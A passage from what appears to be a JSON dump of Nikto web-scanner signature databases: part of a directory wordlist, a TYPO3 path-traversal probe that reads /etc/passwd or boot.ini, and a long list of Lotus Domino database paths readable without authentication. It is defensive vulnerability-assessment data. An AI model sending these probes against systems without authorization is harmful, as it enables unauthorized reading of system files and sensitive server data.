outbox\nshow\nshow_post\nshow_thread\nshowcat\nshowenv\nshowjobs\nshowmap\nshowmsg\nshowpost\nshowthread\nsign\nsigned\nsigner\nsignin\nsigning\nsignoff\nsignon\nsignout\nsignup\nsimple\nsink\nsite\nsite-map\nsite_map\nsitemap\nsites\nskel\nskin\nskins\nskip\nsl\nsling\nsm\nsmall\nsmile\nsmiles\nsms\nsmtp\nsnoop\nsoap\nsoaprouter\nsoft\nsoftware\nsolaris\nsold\nsolution\nsolutions\nsource\nsources\nsoutbox\nsox\nsp\nspace\nspacer\nspam\nspecial\nspecials\nsponsor\nsponsors\nspool\nsport\nsports\nsqlnet\nsquirrel\nsquirrelmail\nsrc\nsrv\nss\nssh\nssi\nssl\nsslvpn\nssn\nsso\nstaff\nstaging\nstandalone\nstandard\nstandards\nstar\nstart\nstat\nstatement\nstatements\nstatic\nstaticpages\nstatistic\nstatistics\nstats\nstatus\nstock\nstorage\nstore\nstored\nstories\nstory\nstrut\nstruts\nstudent\nstudents\nstuff\nstyle\nstyles\nsubmissions\nsubmit\nsubscribe\nsubscribed\nsubscriber\nsubscribers\nsubscription\nsubscriptions\nsuccess\nsuite\nsuites\nsun\nsunos\nsuper\nsupport\nsurf\nsurvey\nsurveys\nsws\nsynapse\nsync\nsynced\nsys\nsysmanager\nsystem\nsystems\nsysuser\nt\ntag\ntags\ntape\ntapes\ntapestry\ntb\ntcl\nteam\ntech\ntechnical\ntechnology\ntel\ntele\ntempl\ntemplate\ntemplates\nterms\ntest-cgi\ntest-env\ntest1\ntest123\ntest1234\ntest2\ntest3\ntestimonial\ntestimonials\ntesting\ntests\ntexis\ntext\ntexts\ntheme\nthemes\nthread\nthreads\nthumb\nthumbnail\nthumbnails\nthumbs\ntickets\ntiki\ntiles\ntip\ntips\ntitle\ntls\ntmpl\ntmps\ntn\ntoc\ntodo\ntoggle\ntomcat\ntool\ntoolbar\ntoolkit\ntools\ntop\ntopic\ntopics\ntorrent\ntorrents\ntos\ntour\ntpl\ntpv\ntr\ntraceroute\ntrace\ntraces\ntrack\ntrackback\ntracker\ntrackers\ntracking\ntracks\ntraffic\ntrailer\ntrailers\ntraining\ntrans\ntransparent\ntransport\ntrash\ntravel\ntreasury\ntree\ntrees\ntrial\ntrunk\ntsweb\ntt\nturbine\ntuscany\ntutorial\ntutorials\ntv\ntweak\ntype\ntypo3\ntypo3conf\nu\nubb\nuds\nuk\numts\nunion\nunix\nunlock\nunreg\nunregister\nunsubscribe\nup\nupd\nupdate\nupdated\nupdater\nupdates\nupfile\nupfiles\nupload\nuploader\nuploads\nurl\nurls\nus\nusa\nusage\nuser\nuserlog\nusers\nusr\nutil\nutilities\nutility\nutils\nv\nv1\nv2\nvar\nvault\nvector\nvelocity\nvendor\nver\nver1\nver2\nversion\nvfs\nvideo\nvideos\nview\nview-source\nviewcvs\nviewforum\nviewonline\nviews\nviewsource\nviewsvn\nviewtopic\nviewvc\nvirtual\nvm\nvoip\nvol\nvote\nvoter\nvotes\nvpn\nvuln\nw\nw3\nw3c\nwa\nwap\nwar\nwarez\nway-board\nwbboard\nwc\nweather\nweb\nweb-beans\nweb-console\nwebaccess\nwebadmin\nwebagent\nwebalizer\nwebapp\nwebb\nwebbbs\nwebboard\nwebcalendar\nwebcart\nwebcasts\nwebcgi\nwebchat\nwebdata\nwebdav\nwebdb\nweblog\nweblogic\nweblogs\nwebmail\nwebplus\nwebshop\nwebsite\nwebsphere\nwebsql\nwebstats\nwebsvn\nwebwork\nweek\nweekly\nwelcome\nwhitepapers\nwhois\nwhosonline\nwicket\nwiki\nwin\nwin32\nwindows\nwinnt\nwireless\nwml\nword\nwordpress\nwork\nworking\nworld\nwp\nwp-content\nwp-dbmanager\nwp-includes\nwp-login\nwp-syntax\nwrap\nws\nws-client\nws_ftp\nwtai\nwww\nwww-sql\nwww1\nwww2\nwww3\nwwwboard\nwwwroot\nwwwstats\nwwwthreads\nwwwuser\nwysiwyg\nx\nxalan\nxerces\nxhtml\nxmlrpc\nxslt\nxsql\nxxx\nxyzzy\ny\nyahoo\nyear\nyearly\nyoutube\nyt\nz\nzboard\nzencart\nzend\nzero\nzipfiles\nzips\nzoom\nzope\nzorum\n"
  },
  {
    "path": "nikto/program/databases/db_dir_traversal",
    "content": "#VERSION,2.1.6\n#######################################################################\n# File Source: https://cirt.net\n# (c) 2001 Chris Sullo, All Rights Reserved.\n# This file may only be distributed and used with the full Nikto package.\n# This file may not be used with any software product without written permission from\n# Chris Sullo (csullo@gmail.com)\n#\n# Note:\n# By submitting updates to this file you are transferring any and all copyright\n# interest in the data to Chris Sullo so it can modified, incorporated into this product\n# relicensed or reused.\n#\n#######################################################################\n# Notes:\n# NiktoDB 1.0\n# Use @TRAVALL, @TRAVLIN or @TRAVWIN as a placeholder where nikto\n# should insert the file to check.\n# @TRAVLIN: /etc/passwd\n# @TRAVWIN: boot.ini winnt/win.ini windows/win.ini\n# @TRAVALL: All of the above\n#######################################################################\n\"nikto_id\",\"osvdb_id\",\"file\",\"description\"\n\"521000\",\"54058\",\"typo3/dev/translations.php?ONLY=%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/@TRAVALL%00\",\"TYPO3 allows any file to be retrieved remotely. Upgrade to the latest version.\"\n"
  },
  {
    "path": "nikto/program/databases/db_domino",
    "content": "#VERSION,2.1.6\n#######################################################################\n# File Source: https://cirt.net\n# (c) 2001 Chris Sullo, All Rights Reserved.\n# This file may only be distributed and used with the full Nikto package.\n# This file may not be used with any software product without written permission from\n# Chris Sullo (csullo@gmail.com)\n#\n# Note:\n# By submitting updates to this file you are transferring any and all copyright\n# interest in the data to Chris Sullo so it can modified, incorporated into this product\n# relicensed or reused.\n#\n#######################################################################\n# Notes:\n# NiktoDB 1.0\n# nikto_id 520011 had a pattern \"DB Analysis\" in the old db_tests entry\n#######################################################################\n\"nikto_id\",\"file\",\"description\"\n\"520001\",\"/catalog.nsf\",\"A list of server databases can be retrieved, as well as a list of ACLs.\"\n\"520002\",\"/cersvr.nsf\",\"Server certificate data can be accessed remotely.\"\n\"520003\",\"/domlog.nsf\",\"The domain server logs can be accessed remotely.\"\n\"520004\",\"/events4.nsf\",\"The events log can be accessed remotely.\"\n\"520005\",\"/log.nsf\",\"The server log is remotely accessible.\"\n\"520006\",\"/names.nsf\",\"User names and groups can be accessed remotely (possibly password hashes as well)\"\n\"520007\",\"/hidden.nsf\",\"This database can be read without authentication. Common database name.\"\n\"520008\",\"/setup.nsf\",\"The server can be configured remotely, or current setup can be downloaded.\"\n\"520009\",\"/statrep.nsf\",\"Any reports generated by the admins can be retrieved.\"\n\"520010\",\"/webadmin.nsf\",\"The server admin database can be accessed remotely.\"\n\"520011\",\"/dba4.nsf\",\"This Lotus Domino page contains database views that disclose sensitive information.\"\n\"520012\",\"/account.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520013\",\"/accounts.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520014\",\"/admin.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520015\",\"/admin4.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520016\",\"/admin5.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520017\",\"/agentrunner.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520018\",\"/alog.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520019\",\"/archive/a_domlog.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520020\",\"/archive/l_domlog.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520021\",\"/a_domlog.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520022\",\"/billing.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520023\",\"/bookmark.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520024\",\"/books.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520025\",\"/busytime.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520026\",\"/calendar.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520027\",\"/certa.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520028\",\"/certlog.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520029\",\"/certsrv.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520030\",\"/chatlog.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520031\",\"/clbusy.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520032\",\"/cldbdir.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520033\",\"/clusta4.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520034\",\"/collect4.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520035\",\"/cpa.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520036\",\"/customerdata.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520037\",\"/da.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520038\",\"/database.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520039\",\"/db.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520040\",\"/dclf.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520041\",\"/DEASAppDesign.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520042\",\"/DEASLog.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520043\",\"/DEASLog01.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520044\",\"/DEASLog02.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520045\",\"/DEASLog03.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520046\",\"/DEASLog04.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520047\",\"/DEASLog05.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520048\",\"/decsadm.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520049\",\"/decsdoc.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520050\",\"/decslog.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520051\",\"/DEESAdmin.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520052\",\"/default.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520053\",\"/dirassist.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520054\",\"/doladmin.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520055\",\"/dols_help.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520056\",\"/domadmin.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520057\",\"/domcfg.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520058\",\"/event.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520059\",\"/events.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520060\",\"/events5.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520061\",\"/group.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520062\",\"/groups.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520063\",\"/help5_admin.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520064\",\"/help5_client.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520065\",\"/help5_designer.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520066\",\"/homepage.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520067\",\"/iNotes/Forms5.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520068\",\"/jotter.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520069\",\"/kbccv11.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520070\",\"/kbnv11.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520071\",\"/kbssvv11.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520072\",\"/lcon.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520073\",\"/ldap.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520074\",\"/leiadm.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520075\",\"/leilog.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520076\",\"/leivlt.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520077\",\"/log4a.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520078\",\"/lsxlc.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520079\",\"/l_domlog.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520080\",\"/mab.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520081\",\"/mail/adminisist.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520082\",\"/mailw46.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520083\",\"/msdwda.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520084\",\"/mtatbls.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520085\",\"/mtdata/mtstore.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520086\",\"/mtstore.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520087\",\"/nntp/nd000000.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520088\",\"/nntp/nd000001.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520089\",\"/nntp/nd000002.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520090\",\"/nntp/nd000003.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520091\",\"/nntp/nd000004.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520092\",\"/nntppost.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520093\",\"/notes.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520094\",\"/ntsync4.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520095\",\"/ntsync45.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520096\",\"/perweb.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520097\",\"/private.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520098\",\"/public.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520099\",\"/qpadmin.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520100\",\"/quickplace/quickplace/main.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520101\",\"/quickstart/qstart50.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520102\",\"/quickstart/wwsample.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520103\",\"/readme.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520104\",\"/reports.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520105\",\"/schema50.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520106\",\"/secret.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520107\",\"/setupweb.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520108\",\"/smbcfg.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520109\",\"/smconf.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520110\",\"/smency.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520111\",\"/smmsg.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520112\",\"/smquar.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520113\",\"/smsolar.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520114\",\"/smtime.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520115\",\"/smtp.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520116\",\"/smtpibwq.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520117\",\"/smtpobwq.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520118\",\"/smtptbls.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520119\",\"/smvlog.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520120\",\"/software.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520121\",\"/statmail.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520122\",\"/stauths.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520123\",\"/stautht.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520124\",\"/stconf.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520125\",\"/stconfig.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520126\",\"/stdnaset.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520127\",\"/stdomino.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520128\",\"/stlog.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520129\",\"/streg.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520130\",\"/stsrc.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520131\",\"/test.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520132\",\"/today.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520133\",\"/userreg.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520134\",\"/users.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520135\",\"/vpuserinfo.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520136\",\"/web.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520137\",\"/webuser.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520138\",\"/welcome.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520139\",\"/wksinst.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520140\",\"/doc/domguide.nsf\",\"This documentation database can be read without authentication. All default files should be removed.\"\n\"520141\",\"/doc/dspug.nsf\",\"This documentation database can be read without authentication. All default files should be removed.\"\n\"520142\",\"/doc/help4.nsf\",\"This documentation database can be read without authentication. All default files should be removed.\"\n\"520143\",\"/doc/helpadmin.nsf\",\"This documentation database can be read without authentication. All default files should be removed.\"\n\"520144\",\"/doc/helplt4.nsf\",\"This documentation database can be read without authentication. All default files should be removed.\"\n\"520145\",\"/doc/internet.nsf\",\"This documentation database can be read without authentication. All default files should be removed.\"\n\"520146\",\"/doc/javapg.nsf\",\"This documentation database can be read without authentication. All default files should be removed.\"\n\"520147\",\"/doc/lccon.nsf\",\"This documentation database can be read without authentication. All default files should be removed.\"\n\"520148\",\"/doc/migrate.nsf\",\"This documentation database can be read without authentication. All default files should be removed.\"\n\"520149\",\"/doc/npn_admn.nsf\",\"This documentation database can be read without authentication. All default files should be removed.\"\n\"520150\",\"/doc/npn_rn.nsf\",\"This documentation database can be read without authentication. All default files should be removed.\"\n\"520151\",\"/doc/readmec.nsf\",\"This documentation database can be read without authentication. All default files should be removed.\"\n\"520152\",\"/doc/readmes.nsf\",\"This documentation database can be read without authentication. All default files should be removed.\"\n\"520153\",\"/doc/smhelp.nsf\",\"This documentation database can be read without authentication. All default files should be removed.\"\n\"520154\",\"/doc/srvinst.nsf\",\"This documentation database can be read without authentication. All default files should be removed.\"\n\"520155\",\"/domguide.nsf\",\"This documentation database can be read without authentication. All default files should be removed.\"\n\"520156\",\"/dspug.nsf\",\"This documentation database can be read without authentication. All default files should be removed.\"\n\"520157\",\"/help/domguide.nsf\",\"This documentation database can be read without authentication. All default files should be removed.\"\n\"520158\",\"/help/dspug.nsf\",\"This documentation database can be read without authentication. All default files should be removed.\"\n\"520159\",\"/help/help4.nsf\",\"This documentation database can be read without authentication. All default files should be removed.\"\n\"520160\",\"/help/helpadmin.nsf\",\"This documentation database can be read without authentication. All default files should be removed.\"\n\"520161\",\"/help/helplt4.nsf\",\"This documentation database can be read without authentication. All default files should be removed.\"\n\"520162\",\"/help/internet.nsf\",\"This documentation database can be read without authentication. All default files should be removed.\"\n\"520163\",\"/help/javapg.nsf\",\"This documentation database can be read without authentication. All default files should be removed.\"\n\"520164\",\"/help/lccon.nsf\",\"This documentation database can be read without authentication. All default files should be removed.\"\n\"520165\",\"/help/migrate.nsf\",\"This documentation database can be read without authentication. All default files should be removed.\"\n\"520166\",\"/help/npn_admn.nsf\",\"This documentation database can be read without authentication. All default files should be removed.\"\n\"520167\",\"/help/npn_rn.nsf\",\"This documentation database can be read without authentication. All default files should be removed.\"\n\"520168\",\"/help/readmec.nsf\",\"This documentation database can be read without authentication. All default files should be removed.\"\n\"520169\",\"/help/readmes.nsf\",\"This documentation database can be read without authentication. All default files should be removed.\"\n\"520170\",\"/help/smhelp.nsf\",\"This documentation database can be read without authentication. All default files should be removed.\"\n\"520171\",\"/help/srvinst.nsf\",\"This documentation database can be read without authentication. All default files should be removed.\"\n\"520172\",\"/help4.nsf\",\"This documentation database can be read without authentication. All default files should be removed.\"\n\"520173\",\"/helpadmin.nsf\",\"This documentation database can be read without authentication. All default files should be removed.\"\n\"520174\",\"/helplt4.nsf\",\"This documentation database can be read without authentication. All default files should be removed.\"\n\"520175\",\"/internet.nsf\",\"This documentation database can be read without authentication. All default files should be removed.\"\n\"520176\",\"/javapg.nsf\",\"This documentation database can be read without authentication. All default files should be removed.\"\n\"520177\",\"/lccon.nsf\",\"This documentation database can be read without authentication. All default files should be removed.\"\n\"520178\",\"/migrate.nsf\",\"This documentation database can be read without authentication. All default files should be removed.\"\n\"520179\",\"/npn_admn.nsf\",\"This documentation database can be read without authentication. All default files should be removed.\"\n\"520180\",\"/npn_rn.nsf\",\"This documentation database can be read without authentication. All default files should be removed.\"\n\"520181\",\"/readmec.nsf\",\"This documentation database can be read without authentication. All default files should be removed.\"\n\"520182\",\"/readmes.nsf\",\"This documentation database can be read without authentication. All default files should be removed.\"\n\"520183\",\"/smhelp.nsf\",\"This documentation database can be read without authentication. All default files should be removed.\"\n\"520184\",\"/srvinst.nsf\",\"This documentation database can be read without authentication. All default files should be removed.\"\n\"520185\",\"/deslog.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520186\",\"/docdomguide.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520187\",\"/docdspug.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520188\",\"/dochelp4.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520189\",\"/dochelpadmin.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520190\",\"/dochelplt4.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520191\",\"/docinternet.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520192\",\"/docjavapg.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520193\",\"/doclccon.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520194\",\"/docmigrate.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520195\",\"/docnpn_admn.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520196\",\"/docnpn_rn.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520197\",\"/docreadmec.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520198\",\"/docreadmes.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520199\",\"/docsmhelp.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520200\",\"/docsrvinst.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520201\",\"/helpdomguide.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520202\",\"/helpdspug.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520203\",\"/helphelp4.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520204\",\"/helphelpadmin.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520205\",\"/helphelplt4.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520206\",\"/helpinternet.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520207\",\"/helpjavapg.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520208\",\"/helplccon.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520209\",\"/helpmigrate.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520210\",\"/helpnpn_admn.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520211\",\"/helpnpn_rn.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520212\",\"/helpreadmec.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520213\",\"/helpreadmes.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520214\",\"/helpsmhelp.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520215\",\"/helpsrvinst.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520216\",\"/iNotesForms5.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520217\",\"/quickplacequickplacemain.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520218\",\"/quickstartqstart50.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520219\",\"/quickstartwwsample.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520220\",\"/sample/siregw46.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520221\",\"/zmevladm.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520222\",\"/AgentRunner.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520223\",\"/doc/helpadmn.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520224\",\"/doc/svrinst.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520225\",\"/doc/wksinst.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520226\",\"/help/decsdoc.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520227\",\"/help/dols_help.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520228\",\"/help/help5_admin.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520229\",\"/help/help5_client.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520230\",\"/help/help5_designer.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520231\",\"/help/lsxlc.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520232\",\"/sample/faqw46.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520233\",\"/sample/framew46.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520234\",\"/stats675.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520235\",\"/loga4.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520236\",\"/qstart.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520237\",\"/mtabtbls.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520238\",\"/proghelp/KBCCV11.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520239\",\"/mail/admin.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520240\",\"/domino.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520241\",\"/user.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520242\",\"/products.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520243\",\"/secure.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520244\",\"/help/readme.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520245\",\"/help/help6_client.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520246\",\"/help/help6_designer.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520247\",\"/help/help6_admin.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520248\",\"/dbdirman.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520249\",\"/lndfr.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520250\",\"/home.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520251\",\"/mail.box\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520252\",\"/bookmarks.nsf\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520253\",\"/srvnam.htm\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520254\",\"/mail10.box\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520255\",\"/mail1.box\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520256\",\"/mail2.box\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520257\",\"/mail3.box\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520258\",\"/mail4.box\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520259\",\"/mail5.box\",\"This database can be read without authentication, which may reveal sensitive information.\"\n\"520260\",\"/mail6.box\",\"This database can be read without 